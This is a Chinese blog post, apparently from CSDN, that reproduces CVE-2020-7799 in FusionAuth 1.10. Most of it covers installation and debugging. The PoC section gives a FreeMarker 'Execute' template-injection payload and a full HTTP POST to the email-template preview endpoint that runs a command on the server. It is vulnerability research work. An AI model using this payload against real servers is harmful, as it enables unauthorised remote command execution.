[CVE-2020-7799] Apache FreeMarker模板FusionAuth远程代码执行

最新推荐文章于 2024-11-15 13:46:41 发布

caiqiiqi

最新推荐文章于 2024-11-15 13:46:41 发布

阅读量1.6k

点赞数 1

分类专栏： java 安全 Web

本文链接：https://blog.csdn.net/caiqiiqi/article/details/104186575

版权

安全同时被 3 个专栏收录

264 篇文章 9 订阅

订阅专栏

Web

220 篇文章 7 订阅

订阅专栏

java

213 篇文章 3 订阅

订阅专栏

安装的时候一直出现这样的错误，
在这里插入图片描述
而且每次响应都很快，感觉可能并不是账号密码出了问题，然后查看日志发现可能是驱动没加载正确：

后来通过调试，
搞了半天确实是没有加载到mysql驱动：

然而我把mysql驱动jar包放到
fusionauth-app-1.10.0/fusionauth-app/apache-tomcat/lib/
目录下，发现无法打开zip包：
在这里插入图片描述

影响范围

Apache FusionAuth <= 1.10

漏洞描述

在FusionAuth 1.11.0版本之前的中发现了一个问题。经过身份验证的用户允许编辑电子邮件模板（主页->设置->电子邮件模板）或主题（主页->设置->主题），可利用freemarker.template.utility.Execute执行任意命令

漏洞复现

下载：

wget https://storage.googleapis.com/inversoft_products_j098230498/products/fusionauth/1.10.0/fusionauth-app-1.10.0.zip
wget https://storage.googleapis.com/inversoft_products_j098230498/products/fusionauth/1.10.0/fusionauth-search-1.10.0.zip
unzip -q fusionauth-app-1.10.0.zip -d fusionauth-app-1.10.0
unzip -q fusionauth-search-1.10.0.zip -d fusionauth-search-1.10.0
cd fusionauth-search-1.10.0
bin/startup.sh    #先开启es
cd ../fusionauth-app-1.10.0
bin/startup.sh

启动之后如下：
在这里插入图片描述
安装说明参考：
https://fusionauth.io/blog/2019/02/14/download-install-linux-tutorial
下载zip太麻烦了，还是直接下载deb，然后自动安装吧，到时候还可以作为service启动。

sudo dpkg -i fusionauth-app_1.10.0-1_all.deb
sudo dpkg -i fusionauth-search_1.10.0-1_all.deb
sudo service fusionauth-search start
sudo service fusionauth-app start

fusionauth由两部分组成：fusionauth-app和fusionauth-search

最后发现还是zip方式安装成功了…

web界面配置教程：
https://fusionauth.io/docs/v1/tech/tutorials/setup-wizard

安装成功之后是这样的：
在这里插入图片描述

漏洞点

两个触发点都可以接收模板：
(Home -> Settings -> Email Templates) or themes (Home -> Settings -> Themes)
在这里插入图片描述

调试

根据报错信息：io.fusionauth.app.primeframework.FusionAuthMVCWorkflow
在这里插入图片描述

先启动es：

77@ubuntu:~/repos/fusionauth/fusionauth-search-1.10.0$ bin/startup.sh
Starting fusionauth-search ... done.
  --> Logging to /home/77/repos/fusionauth/fusionauth-search-1.10.0/bin/../logs/fusionauth-search.log
Starting fusionauth-app ...  skipped, not installed

由于没找到调试的参数，这里复制命令行参数，

/home/77/repos/fusionauth/fusionauth-app-1.10.0/fusionauth-app/apache-tomcat/../../java/current/bin/java -Djava.util.logging.config.file=/home/77/repos/fusionauth/fusionauth-app-1.10.0/fusionauth-app/apache-tomcat/conf/logging.properties -Djava.util.logging.manager=org.apache.juli.ClassLoaderLogManager -Djava.awt.headless=true -Dfusionauth.http.port=9011 -Dfusionauth.https.port=9013 -Dfusionauth.ajp.port=9019 -Dfusionauth.management.port=9010 -Djdk.tls.ephemeralDHKeySize=2048 -Djava.protocol.handler.pkgs=org.apache.catalina.webresources -Dorg.apache.catalina.security.SecurityListener.UMASK=0027 -Dfusionauth.home.directory=/home/77/repos/fusionauth/fusionauth-app-1.10.0/fusionauth-app/apache-tomcat/.. -Dfusionauth.config.directory=/home/77/repos/fusionauth/fusionauth-app-1.10.0/fusionauth-app/apache-tomcat/../../config -Dfusionauth.log.directory=/home/77/repos/fusionauth/fusionauth-app-1.10.0/fusionauth-app/apache-tomcat/../../logs -Dfusionauth.plugin.directory=/home/77/repos/fusionauth/fusionauth-app-1.10.0/fusionauth-app/apache-tomcat/../../plugins -Xms256M -Xmx256M -Dignore.endorsed.dirs= -classpath /home/77/repos/fusionauth/fusionauth-app-1.10.0/fusionauth-app/apache-tomcat/bin/bootstrap.jar:/home/77/repos/fusionauth/fusionauth-app-1.10.0/fusionauth-app/apache-tomcat/bin/tomcat-juli.jar -Dcatalina.base=/home/77/repos/fusionauth/fusionauth-app-1.10.0/fusionauth-app/apache-tomcat -Dcatalina.home=/home/77/repos/fusionauth/fusionauth-app-1.10.0/fusionauth-app/apache-tomcat -Djava.io.tmpdir=/home/77/repos/fusionauth/fusionauth-app-1.10.0/fusionauth-app/apache-tomcat/temp org.apache.catalina.startup.Bootstrap start

直接手动加上调试参数：

-Xrunjdwp:transport=dt_socket,suspend=n,server=y,address=12346

之后变成：

/home/77/repos/fusionauth/fusionauth-app-1.10.0/fusionauth-app/apache-tomcat/../../java/current/bin/java -Djava.util.logging.config.file=/home/77/repos/fusionauth/fusionauth-app-1.10.0/fusionauth-app/apache-tomcat/conf/logging.properties -Djava.util.logging.manager=org.apache.juli.ClassLoaderLogManager -Djava.awt.headless=true -Dfusionauth.http.port=9011 -Dfusionauth.https.port=9013 -Dfusionauth.ajp.port=9019 -Dfusionauth.management.port=9010 -Djdk.tls.ephemeralDHKeySize=2048 -Djava.protocol.handler.pkgs=org.apache.catalina.webresources -Dorg.apache.catalina.security.SecurityListener.UMASK=0027 -Dfusionauth.home.directory=/home/77/repos/fusionauth/fusionauth-app-1.10.0/fusionauth-app/apache-tomcat/.. -Dfusionauth.config.directory=/home/77/repos/fusionauth/fusionauth-app-1.10.0/fusionauth-app/apache-tomcat/../../config -Dfusionauth.log.directory=/home/77/repos/fusionauth/fusionauth-app-1.10.0/fusionauth-app/apache-tomcat/../../logs -Dfusionauth.plugin.directory=/home/77/repos/fusionauth/fusionauth-app-1.10.0/fusionauth-app/apache-tomcat/../../plugins -Xms1024M -Xmx1024M -Xrunjdwp:transport=dt_socket,suspend=n,server=y,address=12346 -Dignore.endorsed.dirs= -classpath /home/77/repos/fusionauth/fusionauth-app-1.10.0/fusionauth-app/apache-tomcat/bin/bootstrap.jar:/home/77/repos/fusionauth/fusionauth-app-1.10.0/fusionauth-app/apache-tomcat/bin/tomcat-juli.jar -Dcatalina.base=/home/77/repos/fusionauth/fusionauth-app-1.10.0/fusionauth-app/apache-tomcat -Dcatalina.home=/home/77/repos/fusionauth/fusionauth-app-1.10.0/fusionauth-app/apache-tomcat -Djava.io.tmpdir=/home/77/repos/fusionauth/fusionauth-app-1.10.0/fusionauth-app/apache-tomcat/temp org.apache.catalina.startup.Bootstrap start

启动之后：
在这里插入图片描述
然后在IDEA中开始调试。
跟了半天终于跟到了这里：

在这里插入图片描述
然后知道是PreviewAction，找到了这个类：
D:\repos\fusionauth-app-1.10.0\fusionauth-app\web\WEB-INF\lib\fusionauth-app-1.10.0.jar!\io\fusionauth\app\action\ajax\email\template\PreviewAction.class
然而没有找到真正的调试点。

PoC需要注意的点：

emailTemplateId必须有效；
primeCSRFToken必须有效；且Referer必须为当前domain:port，比如

Referer: http://192.168.85.129:9011

在这里插入图片描述
将emailTemplate.defaultHtmlTemplate参数设置为payload即可：

${"freemarker.template.utility.Execute"?new()("id")}

完整版：

POST /ajax/email/template/preview HTTP/1.1
Host: 192.168.85.129:9011
Content-Type: application/x-www-form-urlencoded
Content-Length: 198
Connection: close
Referer: http://192.168.85.129:9011
Cookie: JSESSIONID=D1523B4F6BF230FBF2F43C88C3CA48CD; fusionauth.locale=zh_CN

primeCSRFToken=3rufRei9Bm0qnwaJ8WOJQZfGMj2tfFEkcWtcZ7ChvVc&emailTemplateId=8fad660d-7f03-4b5e-b07f-fa3adcc6543c&emailTemplate.defaultHtmlTemplate=${"freemarker.template.utility.Execute"?new()("id")}

参考：
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection

漏洞修复

想看一下1.10.1是怎么修复的，然后下载1.10.1之后发现mysql驱动有问题：
在这里插入图片描述
大小差别有点大。复制之后，发现依然出现这个问题：

17-Mar-2020 02:59:46.089 INFO [main] org.apache.coyote.AbstractProtocol.pause Pausing ProtocolHandler ["ajp-nio-9019"]
17-Mar-2020 02:59:46.089 INFO [main] org.apache.catalina.core.StandardService.stopInternal Stopping service [Catalina]
17-Mar-2020 02:59:46.106 INFO [main] org.apache.coyote.AbstractProtocol.stop Stopping ProtocolHandler ["http-nio-9011"]
17-Mar-2020 02:59:46.106 INFO [main] org.apache.coyote.AbstractProtocol.destroy Destroying ProtocolHandler ["http-nio-9011"]
17-Mar-2020 02:59:46.106 INFO [main] org.apache.coyote.AbstractProtocol.stop Stopping ProtocolHandler ["https-jsse-nio-9013"]
17-Mar-2020 02:59:46.106 INFO [main] org.apache.coyote.AbstractProtocol.destroy Destroying ProtocolHandler ["https-jsse-nio-9013"]
17-Mar-2020 02:59:46.106 INFO [main] org.apache.coyote.AbstractProtocol.stop Stopping ProtocolHandler ["ajp-nio-9019"]
17-Mar-2020 02:59:46.106 INFO [main] org.apache.coyote.AbstractProtocol.destroy Destroying ProtocolHandler ["ajp-nio-9019"]
Mar 17, 2020 2:59:47.056 AM ERROR com.inversoft.maintenance.db.JDBCMaintenanceModeDatabaseService - No [MySQL] Driver found. The [Connector/J jar] may be missing or not be accessible.
Mar 17, 2020 2:59:47.062 AM ERROR com.inversoft.maintenance.db.JDBCMaintenanceModeDatabaseService - No [MySQL] Driver found. The [Connector/J jar] may be missing or not be accessible.
Mar 17, 2020 2:59:57.055 AM ERROR com.inversoft.maintenance.db.JDBCMaintenanceModeDatabaseService - No [MySQL] Driver found. The [Connector/J jar] may be missing or not be accessible.
Mar 17, 2020 2:59:57.062 AM ERROR com.inversoft.maintenance.db.JDBCMaintenanceModeDatabaseService - No [MySQL] Driver found. The [Connector/J jar] may be missing or not be accessible.
Mar 17, 2020 3:00:07.054 AM ERROR com.inversoft.maintenance.db.JDBCMaintenanceModeDatabaseService - No [MySQL] Driver found. The [Connector/J jar] may be missing or not be accessible.
Mar 17, 2020 3:00:07.065 AM ERROR com.inversoft.maintenance.db.JDBCMaintenanceModeDatabaseService - No [MySQL] Driver found. The [Connector/J jar] may be missing or not be accessible.

放弃了。